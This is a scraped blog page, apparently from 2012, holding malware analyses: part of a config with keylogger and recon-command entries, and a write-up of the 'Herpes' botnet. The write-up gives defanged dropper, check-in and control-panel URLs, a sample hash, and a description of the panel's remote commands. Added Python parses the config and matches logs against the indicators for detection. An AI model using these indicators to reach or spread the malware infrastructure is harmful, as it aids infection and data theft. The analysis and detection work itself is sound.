<span style="font-family: Arial; font-size: 10.0pt;"> entry "Video"<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> quality 1<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> length 500<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;"> end<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">end<o:p></o:p></span></div>
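<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">The domain-to-IP list and the CmdList, Keylogger and Video entries above share one simple nested block format (entry "Name" ... end). The following Python is an added example written for this page, not code from the original post or from the malware: it parses that format into a tree and then, as a defender's triage check, reports which hosts-file lines carry the same domain-to-IP pairs as the config. The sample config is constructed from the lines shown; its enclosing block name "DynamicConfig" and the "DnsMap" entry name are assumptions, since the header of the domain list lies earlier in the post than this section. The hosts file is constructed as well.</span></div>

```python
import re

# Constructed sample in the entry "Name" ... end format shown above. The outer
# "DynamicConfig" block and the "DnsMap" entry name are assumptions; the real
# header of the domain-to-IP list lies earlier in the post than this section.
SAMPLE_CONFIG = """\
entry "DynamicConfig"
 entry "DnsMap"
 www.webroot.com=209.85.229.104
 spamcop.net=209.85.229.104
 end
 entry "CmdList"
 "net view"
 "tasklist"
 "set"
 end

 entry "Keylogger"
 processes "calc___.exe"
 time 1
 end

 entry "Video"
 quality 1
 length 500
 end
end
"""

# Constructed hosts file for the triage check; two lines carry config pairs.
SAMPLE_HOSTS = """\
127.0.0.1       localhost
209.85.229.104  www.webroot.com
209.85.229.104  spamcop.net   # constructed: the pair the config would plant
93.184.216.34   www.example.com
"""

ENTRY_RE = re.compile(r'^entry\s+"([^"]+)"$')


def _new_block():
    return {"entries": {}, "map": {}, "items": [], "settings": {}}


def parse_config(text):
    """Parse the nested block format into dicts.

    A line is read as: entry "Sub" (nested block), host=ip (map pair, no
    spaces), "quoted text" (list item) or key value (scalar setting).
    """
    root = _new_block()
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        match = ENTRY_RE.match(line)
        if match:
            child = _new_block()
            stack[-1]["entries"][match.group(1)] = child
            stack.append(child)
        elif line == "end":
            if len(stack) == 1:
                raise ValueError("unbalanced 'end'")
            stack.pop()
        elif len(line) != 1 and line.startswith('"') and line.endswith('"'):
            stack[-1]["items"].append(line[1:-1])
        elif "=" in line and " " not in line:
            key, _, value = line.partition("=")
            stack[-1]["map"][key] = value
        else:
            key, _, value = line.partition(" ")
            stack[-1]["settings"][key] = value.strip().strip('"')
    if len(stack) != 1:
        raise ValueError("missing 'end' for %d block(s)" % (len(stack) - 1))
    return root


def find_entry(block, name):
    """Depth-first search for a named entry anywhere in the parsed tree."""
    for entry_name, child in block["entries"].items():
        if entry_name == name:
            return child
        found = find_entry(child, name)
        if found is not None:
            return found
    return None


def dns_redirects(config, entry_name="DnsMap"):
    """Domain-to-IP pairs the config uses to hijack name resolution."""
    block = find_entry(config, entry_name)
    return dict(block["map"]) if block is not None else {}


def tampered_hosts_entries(hosts_text, redirects):
    """Hostnames whose hosts-file mapping equals a pair from the config."""
    flagged = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, then tokenize
        if not fields:
            continue
        ip, names = fields[0], fields[1:]
        flagged.extend(name for name in names if redirects.get(name) == ip)
    return sorted(flagged)
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 10.0pt;">The map pairs are the useful output for detection: every security-vendor, registry and law-enforcement domain the config points at 209.85.229.104 is a name that should never resolve to that address on a clean machine, so the same pairs can be fed to a DNS-log or hosts-file check.</span></div>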
Jose Dos Santos (http://www.blogger.com/profile/06085925687781351552)<br />
tag:blogger.com,1999:blog-5707299821054210891.post-3353623141992118939<br />
Published 2012-09-15T15:26:00.000-07:00, updated 2012-09-15T15:26:09.382-07:00<br />
Herpes Botnet<br />
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Herpes is a classic botnet with the typical features for managing and controlling infected machines.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">A sample of the trojan that initiates the Herpes infection has been found at:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hxxp://boolbot.org/herp.exe<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Binary
size: 37,888<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">MD5:
6f0084cbc3e67cc1a7ac61a9480baf21<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The URL the trojan uses to connect to the control panel is:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hxxp://boolbot.org/Herpnet/run.php<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The Herpes botnet control panel is accessed via the URL:<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">hxxp://boolbot.org/Herpnet/<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">As shown in the login screen:<o:p></o:p></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-FuaEfKyokyQ/UFTrFzx14iI/AAAAAAAAAKc/GmPTaGbsnIg/s1600/herpes.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="http://1.bp.blogspot.com/-FuaEfKyokyQ/UFTrFzx14iI/AAAAAAAAAKc/GmPTaGbsnIg/s400/herpes.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Once logged in, the Herpes botnet control panel shows statistics on the users infected by the trojan, as in the following screenshot:<o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-KmRbzpTdPMw/UFTrRKuAoXI/AAAAAAAAAKk/dmoBUW4kdy8/s1600/herpes1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="287" src="http://4.bp.blogspot.com/-KmRbzpTdPMw/UFTrRKuAoXI/AAAAAAAAAKk/dmoBUW4kdy8/s400/herpes1.jpg" width="400" /></a></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;">At the time of this analysis, the botnet panel controlled 233 infected machines (bots), of which only 143 were active.</span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;"><br /></span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 15px;">The panel also has a menu for remote control of the infected computers, which runs a series of commands on the online machines currently communicating with the Herpes panel.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-MQuo-Q0CKR0/UFTrYmSTAgI/AAAAAAAAAKs/iieO3X7HGcg/s1600/herpes-tasks.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="462" src="http://1.bp.blogspot.com/-MQuo-Q0CKR0/UFTrYmSTAgI/AAAAAAAAAKs/iieO3X7HGcg/s640/herpes-tasks.jpg" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;"><br /></span></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;">The task menu in the control panel can send the following commands to infected machines:</span></span></div>
<div class="MsoNormal">
<span style="font-family: Arial;"><span style="font-size: 15px;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-5iecZgrKvYY/UFTrjZ8IpyI/AAAAAAAAAK0/5Ja7emdxZx0/s1600/herpes-commands.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-5iecZgrKvYY/UFTrjZ8IpyI/AAAAAAAAAK0/5Ja7emdxZx0/s1600/herpes-commands.jpg" /></a></div>
<div class="MsoNormal">
<span style="font-family: Arial; font-size: 15px;">These commands can be launched remotely to order the infected (zombie) computers to capture screenshots, to capture sensitive user data through the trojan's keylogger, and to download further malicious binaries onto the infected machine.</span></div>
<br />
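<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">The post gives four indicators worth turning into a check: the dropper URL, the check-in URL to run.php, the panel URL and the MD5 and size of herp.exe. The Python below is an added example written for this page, not code from the original post or from the botnet: it matches a constructed proxy log (an assumed "timestamp client method url" layout) against those indicators, groups the clients by which indicator they touched, and compares a file against the sample's hash and size. The hxxp defanging used in the post is replaced by http so that URLs from a real log match.</span></div>

```python
import hashlib
from urllib.parse import urlparse

# Indicators taken from the post above (defanged hxxp written as http).
HERPES_HOST = "boolbot.org"
HERPES_PATHS = {
    "/herp.exe": "dropper download",
    "/Herpnet/run.php": "bot check-in",
    "/Herpnet/": "control panel",
}
HERPES_MD5 = "6f0084cbc3e67cc1a7ac61a9480baf21"
HERPES_SIZE = 37888

# Constructed proxy log in an assumed "timestamp client method url" layout.
SAMPLE_PROXY_LOG = """\
1347745560 10.0.0.12 GET http://www.example.org/index.html
1347745571 10.0.0.12 GET http://boolbot.org/herp.exe
1347745602 10.0.0.12 POST http://boolbot.org/Herpnet/run.php
1347745633 10.0.0.45 GET http://boolbot.org/Herpnet/
1347745640 10.0.0.45 GET http://cdn.example.net/herp.exe
1347745650 10.0.0.77 POST http://BOOLBOT.ORG/Herpnet/run.php
malformed line that should be skipped
"""


def classify_url(url):
    """Return the indicator label for a URL on a Herpes path, else None."""
    parsed = urlparse(url)
    if parsed.hostname != HERPES_HOST:   # urlparse lower-cases the hostname
        return None
    return HERPES_PATHS.get(parsed.path)


def scan_proxy_log(log_text):
    """Collect (client, label, url) for every log line matching an indicator."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue        # skip malformed lines instead of failing the scan
        _ts, client, _method, url = fields
        label = classify_url(url)
        if label is not None:
            hits.append((client, label, url))
    return hits


def clients_by_label(hits):
    """Map each indicator label to the sorted list of clients that hit it.

    Clients under "bot check-in" are the infected machines; a client seen
    only under "control panel" is browsing the panel, not beaconing, and
    deserves a separate look (operator, analyst or curious user).
    """
    grouped = {}
    for client, label, _url in hits:
        grouped.setdefault(label, set()).add(client)
    return {label: sorted(clients) for label, clients in grouped.items()}


def matches_sample(data):
    """True if a file has the size and MD5 the post reports for herp.exe."""
    if len(data) != HERPES_SIZE:         # cheap check first, hash only on a size match
        return False
    return hashlib.md5(data).hexdigest() == HERPES_MD5
```

<div class="MsoNormal">
<span style="font-family: Arial; font-size: 11.0pt;">Matching on hostname plus exact path rather than on the substring "boolbot.org" keeps the three indicators apart in the report, which is what makes the check-in group usable as an infected-host list; the MD5 comparison is only good for this exact sample, so a size mismatch is a legitimate reason to skip hashing rather than a sign the file is clean.</span></div>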
Jose Dos Santos (http://www.blogger.com/profile/06085925687781351552)